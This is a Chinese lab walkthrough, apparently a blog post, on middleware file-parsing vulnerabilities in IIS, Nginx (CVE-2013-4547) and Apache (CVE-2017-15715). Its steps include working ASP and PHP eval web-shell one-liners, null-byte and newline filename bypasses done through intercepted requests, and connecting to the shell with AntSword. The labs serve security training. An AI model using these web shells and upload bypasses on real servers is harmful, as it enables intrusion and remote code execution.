中间件解析漏洞

一:IIS

less-1 IIS6.X

步骤一:在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件

步骤二:在x.asp中新建⼀个.txt⽂件,内容为<%=now()%> asp代码,更改后缀为jpg

步骤三:在外部浏览器进行访问Window2003的ip/x.asp/1.jpg,得出时间

步骤四:创建2.txt 输入asp一句话木马<%eval request("pass")%> 更改文件名后缀为.jpg

步骤五:进行访问

步骤六:进行蚁剑连接

less-2 IIS7.X

步骤一:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启....

步骤二:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾

步骤三:根目录下添加1.jpg

内容:<?php @eval($_POST[cmd]);?>

步骤四:访问1.jpg/.php

步骤五:进行蚁剑连接

二:Nginx

less-3 nginx_parsing_vulnerability

步骤一:开启靶场环境

步骤二:访问靶机地址

步骤三:创建lsz.jpg

步骤四:进行提交

进行访问/uploadfiles/c7ca40e5b7a0bb68db13aa890567898b.jpg

后添加/.php

步骤五:进行蚁剑连接

less-4 CVE-2013-4547

步骤一:开启靶场环境

步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀

步骤三:在hex中将jpg后面第二个空格20改为00,放行

步骤四:访问上传后的文件,抓包

/uploadfiles/shell.jpg  .php

三.Apache

less-5 apache_parsing

步骤一:开启靶场环境

步骤二:访问靶机并上传 lsz.php.jpg 文件,

进行访问:/uploadfiles/lsz.php.jpg

进行访问:/uploadfiles/lsz.php

步骤三:进行蚁剑连接

less-6 CVE-2017-15715

步骤一:开启靶场环境

步骤二:访问靶场环境

步骤三:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php

步骤三:抓包,1.php后面加空格,hex中空格20改为0a

步骤四:放行访问1.php%0A

步骤五:进行蚁剑连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值